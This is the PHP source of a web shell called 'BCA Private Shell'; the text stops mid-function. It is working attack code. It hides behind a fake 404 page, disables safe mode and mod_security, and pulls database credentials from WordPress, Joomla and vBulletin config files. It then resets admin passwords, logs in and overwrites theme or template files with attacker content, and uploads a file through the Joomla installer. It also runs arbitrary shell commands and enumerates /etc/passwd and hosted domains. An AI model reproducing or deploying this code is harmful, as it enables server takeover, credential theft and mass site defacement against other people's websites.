BCA Private Shell

1. <?php
2.  
3. $auth_pass = "";
4.  
5. $color = "#00ff00";
6.  
7. $default_action = 'FilesMan';
8.  
9. @define('SELF_PATH','__FILE__');
10.  
11. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
12.  
13. header('HTTP/1.0 404 Not Found');
14.  
15. exit;
16.  
17. }
18.  
19. @session_start();
20.  
21. @error_reporting(0);
22.  
23. @ini_set('error_log',NULL);
24.  
25. @ini_set('log_errors',0);
26.  
27. @ini_set('max_execution_time',0);
28.  
29. @set_time_limit(0);
30.  
31. @set_magic_quotes_runtime(0);
32.  
33. @define('VERSION','2.1');
34.  
35. if( get_magic_quotes_gpc() ) {
36.  
37. function stripslashes_array($array) {
38.  
39. return is_array($array) ?array_map('stripslashes_array',$array) : stripslashes($array);
40.  
41. }
42.  
43. $_POST = stripslashes_array($_POST);
44.  
45. }
46.  
47. function printLogin() {
48.  
49. ;echo '
50.  
51. <h1>Not Found</h1>
52.  
53. <p>The requested URL was not found on this server.</p>
54.  
55. <hr>
56.  
57. <address>Apache Server at ';echo $_SERVER['HTTP_HOST'];echo ' Port 80</address>
58.  
59. <style>
60.  
61. input { margin:0;background-color:#fff;border:1px solid #fff; }
62.  
63. </style>
64.  
65. <center>
66.  
67. <form method=post>
68.  
69. <input type=password name=pass>
70.  
71. </form></center>
72.  
73. ';
74.  
75. exit;
76.  
77. }
78.  
79. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
80.  
81. if( empty( $auth_pass ) ||
82.  
83. ( isset( $_POST['pass'] ) &&( md5($_POST['pass']) == $auth_pass ) ) )
84.  
85. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
86.  
87. else
88.  
89. printLogin();
90.  
91. @ini_set('error_log',NULL);
92.  
93. @ini_set('log_errors',0);
94.  
95. @ini_set('max_execution_time',0);
96.  
97. @set_time_limit(0);
98.  
99. @set_magic_quotes_runtime(0);
100.  
101. $enable_wp = true;
102.  
103. $enable_joomla = true;
104.  
105. $enable_vb = false;
106.  
107. $enable_phpbb = false;
108.  
109. $enable_ipb = false;
110.  
111. if(isset($_SESSION['safechk'])){
112.  
113. if(ini_get('safe_mode') or ini_get('disable_functions') or !ini_get('allow_url_fopen')){
114.  
115. $byphp = "safe_mode = Off
116.  
117. disable_functions =
118.  
119. safe_mode_gid = OFF
120.  
121. open_basedir = OFF
122.  
123. allow_url_fopen = On";
124.  
125. $byht = "<IfModule mod_security.c>
126.  
127. SecFilterEngine Off
128.  
129. SecFilterScanPOST Off
130.  
131. SecFilterCheckURLEncoding Off
132.  
133. SecFilterCheckUnicodeEncoding Off
134.  
135. </IfModule>";
136.  
137. file_put_contents("php.ini",$byphp);
138.  
139. file_put_contents(".htaccess",$byht);
140.  
141. $_SESSION['safechk'] = "done";
142.  
143. die("PHP Safe Mode ByPassed. Please Refresh This page");
144.  
145. }
146.  
147. }
148.  
149. function convertByte($s) {
150.  
151. if($s >= 1073741824)
152.  
153. return sprintf('%1.2f',$s / 1073741824 ).' GB';
154.  
155. elseif($s >= 1048576)
156.  
157. return sprintf('%1.2f',$s / 1048576 ) .' MB';
158.  
159. elseif($s >= 1024)
160.  
161. return sprintf('%1.2f',$s / 1024 ) .' KB';
162.  
163. else
164.  
165. return $s .' B';
166.  
167. }
168.  
169. function curPageURL() {
170.  
171. $pageURL = 'http';
172.  
173. if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";}
174.  
175. $pageURL .= "://";
176.  
177. if ($_SERVER["SERVER_PORT"] != "80") {
178.  
179. $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
180.  
181. }else {
182.  
183. $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
184.  
185. }
186.  
187. return $pageURL;
188.  
189. }
190.  
191. function chkDis($link,$str){
192.  
193. $lol = get_headers($link,1);
194.  
195. if(strpos($lol[0],"200")){
196.  
197. $nan = file_get_contents($link);
198.  
199. if(strpos($nan,$str)){
200.  
201. return true;
202.  
203. }else{return false;}
204.  
205. }else{return false;}
206.  
207. }
208.  
209. function getDnamed(){
210.  
211. if(is_readable("/var/named")){
212.  
213. $list = scandir("/var/named");
214.  
215. foreach($list as $domain){
216.  
217. if(strpos($domain,".db")){
218.  
219. $i += 1;
220.  
221. $domain = str_replace('.db','',$domain);
222.  
223. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
224.  
225. $dn[$owner['name']] = $domain;
226.  
227. }
228.  
229. }
230.  
231. }
232.  
233. return $dn;
234.  
235. }
236.  
237. function chkSys($link){
238.  
239. $sys_arr = array("WordPress"=>array("l"=>"wp-config.php","s"=>"WordPress"),
240.  
241. "Joomla"=>array("l"=>"configuration.php","s"=>"JConfig"),
242.  
243. );
244.  
245. foreach($sys_arr as $k=>$dan){
246.  
247. if(chkDis($link.$dan['l'],$dan['s'])){
248.  
249. return array('link'=>$link.$dan['l'],'cms'=>$k);
250.  
251. }
252.  
253. }
254.  
255. }
256.  
257. function EloFind($str,$start,$end){
258.  
259. $len = strlen($str);
260.  
261. $start_pos = (strpos($str,$start) +strlen($start));
262.  
263. $str = substr($str,$start_pos);
264.  
265. $end_pos = strpos($str,$end);
266.  
267. $str = substr($str,0,$end_pos);
268.  
269. return $str;
270.  
271. }
272.  
273. function GetPage($url,$cookie,$post = null,$head = true) {
274.  
275. $ch = curl_init();
276.  
277. curl_setopt($ch,CURLOPT_URL,$url);
278.  
279. curl_setopt($ch,CURLOPT_HEADER,$head);
280.  
281. curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
282.  
283. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
284.  
285. curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,true);
286.  
287. curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,2);
288.  
289. curl_setopt($ch,CURLOPT_USERAGENT,$_SERVER['HTTP_USER_AGENT']);
290.  
291. curl_setopt($ch,CURLOPT_COOKIEFILE,$cookie);
292.  
293. curl_setopt($ch,CURLOPT_COOKIEJAR,$cookie);
294.  
295. If ($post != NULL){
296.  
297. curl_setopt($ch,CURLOPT_POST,1);
298.  
299. curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
300.  
301. }
302.  
303. $urlPage = curl_exec($ch);
304.  
305. if(curl_errno($ch)){
306.  
307. echo curl_error($ch);
308.  
309. }
310.  
311. curl_close($ch);
312.  
313. return($urlPage);
314.  
315. }
316.  
317. function throwErr($str){
318.  
319. $arr = array("status"=>"error","msg"=>$str);
320.  
321. die(json_encode($arr));
322.  
323. }
324.  
325. function add2file($file,$str){
326.  
327. if(file_exists($file)){
328.  
329. $do = file_get_contents($file);
330.  
331. if(!strpos($do,$str)){
332.  
333. file_put_contents($file,$str,FILE_APPEND);
334.  
335. }
336.  
337. }else{
338.  
339. file_put_contents($file,$str,FILE_APPEND);
340.  
341. }
342.  
343. }
344.  
345. function doXploitWP($cnf,$html,$npass){
346.  
347. $success = false;
348.  
349. $str = file_get_contents($cnf);
350.  
351. if(preg_match('%DB_USER%',$str)){
352.  
353. $username=EloFind($str,"define('DB_USER', '","');");
354.  
355. $password=EloFind($str,"define('DB_PASSWORD', '","');");
356.  
357. $dbname=EloFind($str,"define('DB_NAME', '","');");
358.  
359. $prefix=EloFind($str,"table_prefix = '","'");
360.  
361. $link=mysql_connect("localhost",$username,$password) ;
362.  
363. if ($link) {
364.  
365. mysql_select_db($dbname,$link) ;
366.  
367. $req1 =mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '$1$42REgxSR$.tLV4PSbQmCKsisyCSyhq.' WHERE `ID` =1 LIMIT 1 ;");
368.  
369. $req =mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
370.  
371. $data = mysql_fetch_array($req);
372.  
373. $site_url=$data["option_value"];
374.  
375. }else{
376.  
377. throwErr("Mysql Fail");
378.  
379. }
380.  
381. $status['site'] = $site_url;
382.  
383. $cookie = 'cookie/'.md5($cnf).'.txt';
384.  
385. @unlink($cookie);
386.  
387. $logged_in = true;
388.  
389. $url = $site_url."/wp-login.php";
390.  
391. $postme = 'log=admin&pwd=123456789&rememberme=forever&wp-submit=Log In&testcookie=1';
392.  
393. $logme = GetPage($url,$cookie,$postme);
394.  
395. if(!preg_match('%logout%',$logme)){
396.  
397. file_put_contents("login.txt",$site_url.$logme);
398.  
399. throwErr("Login Error");
400.  
401. }
402.  
403. if($logged_in){
404.  
405. $url = $site_url."/wp-admin/theme-editor.php";
406.  
407. $themeditor = GetPage($url,$cookie,null);
408.  
409. $nola = explode(Chr(10),$themeditor);
410.  
411. foreach($nola as $nline){
412.  
413. if(preg_match('%theme-editor\.php\?file=%',$nline) &&preg_match('%\((index\.php|home\.php|404\.php|archive\.php|comment\.php)\)%',strtolower($nline))){
414.  
415. $modify[EloFind($nline,'(',')')] = EloFind($nline,'<a href="','"');
416.  
417. }
418.  
419. }
420.  
421. if(is_array($modify)){
422.  
423. foreach($modify as $met=>$indfile){
424.  
425. $nri = str_replace('.','_',$met);
426.  
427. $nri = "n".$nri;
428.  
429. if($_POST[$nri] == "on"&&(!$success OR $met == "index.php")){
430.  
431. $indfile =str_replace("&amp;","&",$indfile);
432.  
433. $url = trim($site_url."/wp-admin/".$indfile);
434.  
435. $themepage = GetPage($url,$cookie,"");
436.  
437. $_wpnonce = EloFind($themepage,'name="_wpnonce" value="','"');
438.  
439. $_file = EloFind($themepage,'name="file" value="','"');
440.  
441. $nfile = explode('themes',$_file);
442.  
443. $jfile = $site_url."/wp-content/themes".end($nfile);
444.  
445. $url = $site_url."/wp-admin/theme-editor.php";
446.  
447. $postme = "newcontent=".urlencode($html)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File";
448.  
449. $themedied = GetPage($url,$cookie,$postme);
450.  
451. if(preg_match('%<div id=\"message\" class=\"updated\">%',$themedied)){
452.  
453. if(!$success){
454.  
455. add2file("wp_site.txt",$jfile.Chr(10));
456.  
457. }
458.  
459. $success = true;
460.  
461. if($met == "index.php"){
462.  
463. add2file("wp_index.txt",$site_url.Chr(10));
464.  
465. }
466.  
467. }else{
468.  
469. $error = true;
470.  
471. }
472.  
473. }
474.  
475. }
476.  
477. }else{
478.  
479. throwErr("No file found");
480.  
481. }
482.  
483. if($success){
484.  
485. $url = trim($site_url."/wp-admin/profile.php");
486.  
487. $themepage = GetPage($url,$cookie,"");
488.  
489. $_wpnonce = EloFind($themepage,'name="_wpnonce" value="','"');
490.  
491. $url = trim($site_url."/wp-admin/profile.php");
492.  
493. $postme = "_wpnonce=".$_wpnonce."&_wp_http_referer=%2Fwp-admin%2Fprofile.php%3Fupdated%3Dtrue&from=profile&checkuser_id=1&admin_color=fresh&admin_bar_front=1&first_name=&last_name=&nickname=admin&display_name=BdBlackHat&email=xxbox1971@yahoo.com&url=&aim=&yim=&jabber=&description=&pass1=".$npass."&pass2=".$npass."&action=update&user_id=1&submit=Update+Profile";
494.  
495. $themepage = GetPage($url,$cookie,$postme);
496.  
497. $status['status'] = "success";
498.  
499. die(json_encode($status));
500.  
501. }
502.  
503. else{
504.  
505. if($error){
506.  
507. throwErr("Could't Update the file");
508.  
509. }else{
510.  
511. throwErr("Selected file not found");
512.  
513. }
514.  
515. }
516.  
517. }
518.  
519. }else{
520.  
521. throwErr("Config not found");
522.  
523. }
524.  
525. return true;
526.  
527. }
528.  
529. function doXploitJM($cnf,$html,$npass){
530.  
531. function joomlaCom($site_url,$cookie,$site){
532.  
533. if($_POST['com_install'] == "on"){
534.  
535. $url = $site_url ."/index.php?option=com_installer";
536.  
537. $compage = GetPage($url,$cookie);
538.  
539. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$compage,$dhash);
540.  
541. $hash = $dhash[1];
542.  
543. preg_match_all('#value="/(.*?)"#s',$compage,$path);
544.  
545. foreach($path[0] as $pathx){
546.  
547. $pathx=ereg_replace('value="','',$pathx);
548.  
549. $pathx=ereg_replace('"','',$pathx);
550.  
551. }
552.  
553. $dir = getcwd()."/bca.html";
554.  
555. $postme = array("install_package"=>"@".$dir ,"install_directory"=>"".$pathx."","install_url"=>"http://","type"=>"","installtype"=>"upload","task"=>"doInstall","option"=>"com_installer","".$hash.""=>"1");
556.  
557. $url = $site_url ."/index.php?option=com_installer";
558.  
559. $com_shell = GetPage($url,$cookie,$postme);
560.  
561. if(preg_match('#<li>Unknown Archive Type</li>#s',$com_shell)){
562.  
563. add2file("jm_site.txt",$site."/tmp/bca.html".Chr(10));
564.  
565. $status['site'] = $site."/tmp/bca.html";
566.  
567. $status['status'] = "success";
568.  
569. die(json_encode($status));
570.  
571. }else{
572.  
573. return false;
574.  
575. }
576.  
577. }
578.  
579. return true;
580.  
581. }
582.  
583. $str = file_get_contents($cnf);
584.  
585. if(preg_match('%(JConfig|mosConfig)%',$str)){
586.  
587. if(preg_match('%JConfig%',$str)){
588.  
589. $username=EloFind($str,"\$user = '","'");
590.  
591. $password=EloFind($str,"\$password = '","'");
592.  
593. $dbname=EloFind($str,"\$db = '","'");
594.  
595. $prefix=EloFind($str,"\$dbprefix = '","'");
596.  
597. $pwd = md5($npass);
598.  
599. if($_POST['domain'] != "..."){
600.  
601. $site_url = $_POST['domain'];
602.  
603. $site_url = "http://".$site_url;
604.  
605. }else{
606.  
607. $mailto = EloFind($str,"\$mailfrom = '","'");
608.  
609. $siteul = explode('@',$mailto);
610.  
611. $site_url = "http://".$siteul[1];
612.  
613. }
614.  
615. }elseif(preg_match('%mosConfig%',$str)){
616.  
617. $username=EloFind($str,"\$mosConfig_user = '","'");
618.  
619. $password=EloFind($str,"\$mosConfig_password = '","'");
620.  
621. $dbname=EloFind($str,"\$mosConfig_db = '","'");
622.  
623. $prefix=EloFind($str,"\$mosConfig_dbprefix = '","'");
624.  
625. $pwd = md5($npass);
626.  
627. if($_POST['domain'] != "..."){
628.  
629. $site_url = $_POST['domain'];
630.  
631. $site_url = "http://".$site_url;
632.  
633. }else{
634.  
635. $mailto = EloFind($str,"\$mosConfig_mailfrom = '","'");
636.  
637. $siteul = explode('@',$mailto);
638.  
639. $site_url = "http://".$siteul[1];
640.  
641. }
642.  
643. }
644.  
645. $site = $site_url;
646.  
647. $site_url = $site_url."/administrator/";
648.  
649. $cookie = 'cookie/'.md5($cnf).'.txt';
650.  
651. @unlink($cookie);
652.  
653. $link=mysql_connect("localhost",$username,$password) ;
654.  
655. if ($link) {
656.  
657. mysql_select_db($dbname,$link);
658.  
659. $changepass = mysql_query("UPDATE ".$prefix."users SET username ='admin' , block ='0' , password = '".$pwd."'");
660.  
661. $doit =mysql_query("SELECT * from `".$prefix."extensions` ");
662.  
663. if($doit){
664.  
665. if($_POST['ignore_def'] == "on"){
666.  
667. $req =mysql_query("SELECT * from `".$prefix."template_styles` WHERE client_id='0' and home='0'");
668.  
669. $data = mysql_fetch_array($req);
670.  
671. $template_name=$data["template"];
672.  
673. if(strlen($template_name) <1){
674.  
675. $req =mysql_query("SELECT * from `".$prefix."template_styles` WHERE client_id='0' and home='1'");
676.  
677. $data = mysql_fetch_array($req);
678.  
679. $template_name=$data["template"];
680.  
681. }
682.  
683. }
684.  
685. else{
686.  
687. $req =mysql_query("SELECT * from `".$prefix."template_styles` WHERE client_id='0' and home='1'");
688.  
689. $data = mysql_fetch_array($req);
690.  
691. $template_name=$data["template"];
692.  
693. }
694.  
695. $req =mysql_query("SELECT * from `".$prefix."extensions` WHERE name='".$template_name."'");
696.  
697. $data = mysql_fetch_array($req);
698.  
699. $template_id=$data["extension_id"];
700.  
701. $url = $site_url ."index.php";
702.  
703. $login_page = GetPage($url,$cookie);
704.  
705. $rhash = EloFind($login_page,'type="hidden" name="return" value="','"');
706.  
707. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$login_page,$dhash);
708.  
709. $hash = $dhash[1];
710.  
711. $url = $site_url ."index.php";
712.  
713. $postme = "username=admin&passwd=".$npass."&usrname=admin&pass=".$npass."&submit=Login&option=com_login&lang=en-GB&task=login&return=".$rhash."&".$hash."=1";
714.  
715. $logginin = GetPage($url,$cookie,$postme);
716.  
717. if(preg_match('%logout|index2\.php%',$logginin)){
718.  
719. $logged_in = true;
720.  
721. }
722.  
723. if(!$logged_in){
724.  
725. file_put_contents("jm_login1.6".md5($site_url).".txt",$site_url.$logginin);
726.  
727. throwErr("Login Error");
728.  
729. }
730.  
731. if($logged_in){
732.  
733. joomlaCom($site_url,$cookie,$site);
734.  
735. $url=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
736.  
737. $themepage = GetPage($url,$cookie);
738.  
739. if(preg_match('%type=\"hidden\" name=\"\w+\" value=\"1\"%',$themepage)){
740.  
741. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage,$dhash);
742.  
743. $hash = $dhash[1];
744.  
745. $url = $site_url."/index.php?option=com_templates&layout=edit";
746.  
747. $postme = "jform[source]=".urlencode($html)."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hash."=1&task=source.save";
748.  
749. $themeedit = GetPage($url,$cookie,$postme);
750.  
751. if(preg_match('%class=\"message message\"%',$themeedit)){
752.  
753. add2file("jm_site.txt",$site."/templates/".$template_name."/index.php".Chr(10));
754.  
755. add2file("jm_index.txt",$site.Chr(10));
756.  
757. if($_POST['ignore_def'] == "on"){
758.  
759. $status['site'] = $site."/templates/".$template_name."/index.php";
760.  
761. }else{
762.  
763. $status['site'] = $site;
764.  
765. }
766.  
767. $status['status'] = "success";
768.  
769. die(json_encode($status));
770.  
771. }
772.  
773. else{
774.  
775. throwErr("Update failed");
776.  
777. }
778.  
779. }
780.  
781. else{
782.  
783. throwErr("Index not found");
784.  
785. }
786.  
787. }
788.  
789. }else{
790.  
791. $req =mysql_query("SELECT * from `".$prefix."templates_menu` WHERE client_id='0'");
792.  
793. $data = mysql_fetch_array($req);
794.  
795. $template_name=$data["template"];
796.  
797. $url = $site_url ."index.php";
798.  
799. $login_page = GetPage($url,$cookie);
800.  
801. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$login_page,$dhash);
802.  
803. $hash = $dhash[1];
804.  
805. $postme = "username=admin&passwd=".$npass."&usrname=admin&lang=en-GB&pass=".$npass."&submit=Login&option=com_login&task=login&".$hash."=1";
806.  
807. $url = $site_url ."index.php";
808.  
809. $logginin = GetPage($url,$cookie,$postme);
810.  
811. if(preg_match('%logout|index2\.php%',$logginin)){
812.  
813. $logged_in = true;
814.  
815. }
816.  
817. if(!$logged_in){
818.  
819. file_put_contents("jm_login1.5".md5($site_url).".txt",$site_url.$logginin);
820.  
821. throwErr("Login Error");
822.  
823. }
824.  
825. if($logged_in){
826.  
827. joomlaCom($site_url,$cookie,$site);
828.  
829. if(preg_match('%index2\.php%',$logginin)){
830.  
831. $url = $site_url ."index2.php";
832.  
833. $logginin = GetPage($url,$cookie);
834.  
835. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$logginin,$dhash);
836.  
837. $hash = $dhash[1];
838.  
839. $url = $site_url ."/index2.php";
840.  
841. $postme = "doPreview=on&cid%5B%5D=".$template_name."&limit=30&limitstart=0&option=com_templates&task=edit_source&boxchecked=1&hidemainmenu=1&client=0&".$hash."=1";
842.  
843. $themepage = GetPage($url,$cookie,$postme);
844.  
845. if(preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage)){
846.  
847. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage,$dhash);
848.  
849. $hash = $dhash[1];
850.  
851. $url=$site_url."/index2.php";
852.  
853. $postme = "filecontent=".urlencode($html)."&template=".$template_name."&option=com_templates&task=save_source&client=0&".$hash."=1";
854.  
855. $themeedit = GetPage($url,$cookie,$postme);
856.  
857. if(preg_match('%Template Manager%',$themeedit)){
858.  
859. add2file("jm_site.txt",$site."/templates/".$template_name."/index.php".Chr(10));
860.  
861. add2file("jm_index.txt",$site.Chr(10));
862.  
863. $status['site'] = $site;
864.  
865. $status['status'] = "success";
866.  
867. die(json_encode($status));
868.  
869. }
870.  
871. else{
872.  
873. file_put_contents("jmupd.txt",$site_url.$themeedit);
874.  
875. throwErr($template_name);
876.  
877. }
878.  
879. }else{
880.  
881. throwErr("Index not found");
882.  
883. }
884.  
885. }
886.  
887. else{
888.  
889. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$logginin,$dhash);
890.  
891. $hash = $dhash[1];
892.  
893. $url = $site_url ."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name."&".$hash."=1";
894.  
895. $themepage = GetPage($url,$cookie);
896.  
897. if(preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage)){
898.  
899. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage,$dhash);
900.  
901. $hash = $dhash[1];
902.  
903. $url=$site_url."/index.php?option=com_templates&layout=edit";
904.  
905. $postme = "filecontent=".urlencode($html)."&id=".$template_name."&cid[]=".$template_name."&".$hash."=1&task=save_source&client=0";
906.  
907. $themeedit = GetPage($url,$cookie,$postme);
908.  
909. if(preg_match('%class=\"message message fade\"%',$themeedit)){
910.  
911. add2file("jm_site.txt",$site."/templates/".$template_name."/index.php".Chr(10));
912.  
913. add2file("jm_index.txt",$site.Chr(10));
914.  
915. $status['site'] = $site;
916.  
917. $status['status'] = "success";
918.  
919. die(json_encode($status));
920.  
921. }
922.  
923. else{
924.  
925. file_put_contents("jmupd.txt",$site_url.$themeedit);
926.  
927. throwErr($template_name);
928.  
929. }
930.  
931. }else{
932.  
933. throwErr("Index not found");
934.  
935. }
936.  
937. }
938.  
939. }
940.  
941. }
942.  
943. }
944.  
945. else{
946.  
947. throwErr("Mysql Fail");
948.  
949. }
950.  
951. }
952.  
953. else{
954.  
955. throwErr("Config not found");
956.  
957. }
958.  
959. }
960.  
961. function doXploitVB($cnf,$html){
962.  
963. $str = file_get_contents($cnf);
964.  
965. if(preg_match('%vBulletin%',$str)){
966.  
967. $username=EloFind($str,"\$config['MasterServer']['username'] = '","'");
968.  
969. $password=EloFind($str,"\$config['MasterServer']['password'] = '","'");
970.  
971. $dbname=EloFind($str,"\$config['Database']['dbname'] = '","'");
972.  
973. $prefix=EloFind($str,"\$config['Database']['tableprefix'] = '","'");
974.  
975. $link=mysql_connect("localhost",$username,$password) ;
976.  
977. if ($link) {
978.  
979. mysql_select_db($dbname,$link);
980.  
981. $html = str_replace('"','\\\"',$html);
982.  
983. $query = "UPDATE template SET template = '".$html."'";
984.  
985. $result =@ mysql_query($query);
986.  
987. if($result){
988.  
989. $query = "SELECT * FROM `datastore` WHERE title = 'options'";
990.  
991. $result =@ mysql_query($query);
992.  
993. $data = mysql_fetch_array($result);
994.  
995. $optionz=$data["data"];
996.  
997. $site_url = EloFind($optionz,'"bburl";s:34:"','"');
998.  
999. $status['site'] = $site_url;
1000.  
1001. $status['status'] = "success";
1002.  
1003. die(json_encode($status));
1004.  
1005. }else{
1006.  
1007. throwErr("Update Failed");
1008.  
1009. }
1010.  
1011. }else{
1012.  
1013. throwErr("Mysql Fail");
1014.  
1015. }
1016.  
1017. }else{
1018.  
1019. throwErr("Config not found");
1020.  
1021. }
1022.  
1023. }
1024.  
1025. function exme($in) {
1026.  
1027. $out = '';
1028.  
1029. if (function_exists('exec')) {
1030.  
1031. @exec($in,$out);
1032.  
1033. $out = @join("</br>",$out);
1034.  
1035. }elseif (function_exists('passthru')) {
1036.  
1037. ob_start();
1038.  
1039. @passthru($in);
1040.  
1041. $out = ob_get_clean();
1042.  
1043. }elseif (function_exists('system')) {
1044.  
1045. ob_start();
1046.  
1047. @system($in);
1048.  
1049. $out = ob_get_clean();
1050.  
1051. }elseif (function_exists('shell_exec')) {
1052.  
1053. $out = shell_exec($in);
1054.  
1055. }elseif (is_resource($f = @popen($in,"r"))) {
1056.  
1057. $out = "";
1058.  
1059. while(!@feof($f))
1060.  
1061. $out .= fread($f,1024);
1062.  
1063. pclose($f);
1064.  
1065. }
1066.  
1067. return $out;
1068.  
1069. }
1070.  
1071. if($_POST['ac'] == "secinfo"){
1072.  
1073. if(is_readable("/etc/named.conf")){
1074.  
1075. echo '&raquo; /etc/named.conf is readable.<br />';
1076.  
1077. }else{
1078.  
1079. echo '&raquo; <font color="red">/etc/named.conf not readable</font> <br />';
1080.  
1081. }
1082.  
1083. if(is_readable("/etc/passwd")){
1084.  
1085. echo '&raquo; /etc/passwd is readable.<br />';
1086.  
1087. }else{
1088.  
1089. echo '&raquo; <font color="red">/etc/passwd not readable</font> <br />';
1090.  
1091. }
1092.  
1093. if(is_readable("/etc/valiases")){
1094.  
1095. echo '&raquo; /etc/valiases exists';
1096.  
1097. if(is_array(scandir("/etc/valiases"))){
1098.  
1099. echo ' & scanable';
1100.  
1101. }
1102.  
1103. echo '.<br />';
1104.  
1105. }else{
1106.  
1107. echo '&raquo; <font color="red">/etc/valiases not readable</font> <br />';
1108.  
1109. }
1110.  
1111. if(is_readable("/var/named")){
1112.  
1113. echo '&raquo; /var/named exists';
1114.  
1115. if(is_array(scandir("/var/named"))){
1116.  
1117. echo ' & scanable';
1118.  
1119. }
1120.  
1121. echo '.<br />';
1122.  
1123. }else{
1124.  
1125. echo '&raquo; <font color="red">/var/named not readable</font> <br />';
1126.  
1127. }
1128.  
1129. if(ini_get('disable_functions')){
1130.  
1131. echo '&raquo; '.ini_get('disable_functions').' are disabled<br />';
1132.  
1133. }
1134.  
1135. if(function_exists("symlink")){
1136.  
1137. echo '&raquo; Symlinking allowed<br />';
1138.  
1139. }else{
1140.  
1141. echo '&raquo; <font color="red">Symlinking not allowed</font> <br />';
1142.  
1143. }
1144.  
1145. if(is_writable("/var/tmp")){
1146.  
1147. echo '&raquo; /var/tmp folder is writable<br />';
1148.  
1149. }
1150.  
1151. if(is_readable('/var/log')){
1152.  
1153. echo '&raquo; /var/log folder is readable<br />';
1154.  
1155. }
1156.  
1157. die();
1158.  
1159. }
1160.  
1161. elseif($_POST['ac'] == "sysinfo"){
1162.  
1163. echo "<span style='color:red;'><strong>System:</strong></span> ".php_uname()."<br />";
1164.  
1165. echo "<span style='color:red;'><strong>WebServer:</strong></span> ".$_SERVER['SERVER_SOFTWARE']."<br />";
1166.  
1167. echo "<span style='color:red;'><strong>PHP version:</strong></span> ".phpversion()." on ".php_sapi_name()."<br />";
1168.  
1169. $ssys = "None";
1170.  
1171. if(is_dir("/usr/local/cpanel")){
1172.  
1173. $ssys = "Running On Cpanel";
1174.  
1175. }elseif(is_dir("/usr/local/directadmin")){
1176.  
1177. $ssys = "Running On Directadmin";
1178.  
1179. }
1180.  
1181. echo "<span style='color:red;'><strong>Server System:</strong></span> ".$ssys."<br />";
1182.  
1183. if(function_exists("disk_total_space")){
1184.  
1185. echo "<span style='color:red;'><strong>Free Disk:</strong></span> ".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."<br />";
1186.  
1187. }
1188.  
1189. echo "<span style='color:red;'><strong>Server IP:</strong></span> ".$_SERVER["SERVER_ADDR"]."<br />";
1190.  
1191. die();
1192.  
1193. }
1194.  
1195. elseif($_POST['ac'] == "browse"){
1196.  
1197. error_reporting(0);
1198.  
1199. if($_POST['path'] != ""){
1200.  
1201. $path = $_POST['path'];
1202.  
1203. }else{
1204.  
1205. $path = getcwd();
1206.  
1207. }
1208.  
1209. $filez = scandir($path);
1210.  
1211. $q = 2;
1212.  
1213. foreach($filez as $mfile){
1214.  
1215. if($q == 2){$q = 1;}else{$q = 2;}
1216.  
1217. $npath = $_POST['path'].$mfile;
1218.  
1219. $stat = stat($npath);
1220.  
1221. $usr = posix_getpwuid($stat['uid']);
1222.  
1223. $grp = posix_getpwuid($stat['gid']);
1224.  
1225. if(is_dir($npath)){
1226.  
1227. $size = "Dir";
1228.  
1229. }else{
1230.  
1231. $size = convertByte($stat['size']);
1232.  
1233. }
1234.  
1235. $fperm = substr(sprintf('%o',fileperms($npath)),-4);
1236.  
1237. if(!$fperm){
1238.  
1239. $fperm = "<font color='red'>Restricted</font>";
1240.  
1241. }elseif(is_writeable($npath)){
1242.  
1243. $fperm = "<font color='#28FE14'>".$fperm."</font>";
1244.  
1245. }elseif(is_readable($npath)){
1246.  
1247. $fperm = "<font color='yellow'>".$fperm."</font>";
1248.  
1249. }
1250.  
1251. echo '<div class="filetable">
1252.  
1253. <div class="tblbx'.$q.'" style="width:220px;text-align:left;"><a href="" onClick="filebrs(\''.$npath.'/\'); return false;">'.$mfile.'</a></div>
1254.  
1255. <div class="tblbx'.$q.'" style="width:80px;">'.$size.'</div>
1256.  
1257. <div class="tblbx'.$q.'" style="width:100px;">Modify</div>
1258.  
1259. <div class="tblbx'.$q.'" style="width:100px;">'.$usr['name']."/".$grp['name'].'</div>
1260.  
1261. <div class="tblbx'.$q.'" style="width:100px;">'.$fperm.'</div>
1262.  
1263. <div class="tblbx'.$q.'" style="width:80px;">Action</div>
1264.  
1265. </div>';
1266.  
1267. }
1268.  
1269. die();
1270.  
1271. }
1272.  
1273. elseif($_POST['ac'] == "chknamed"){
1274.  
1275. error_reporting(0);
1276.  
1277. if(is_readable("/etc/named.conf")){
1278.  
1279. $named = file_get_contents("/etc/named.conf");
1280.  
1281. preg_match_all('%zone \"(.*)\" {%',$named,$domains);
1282.  
1283. foreach($domains[1] as $domain){
1284.  
1285. $domain = trim($domain);
1286.  
1287. $i += 1;
1288.  
1289. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1290.  
1291. $dn .= "<a href='http://".$domain."'>".$domain."</a> - ".$owner['name']."<br />";
1292.  
1293. }
1294.  
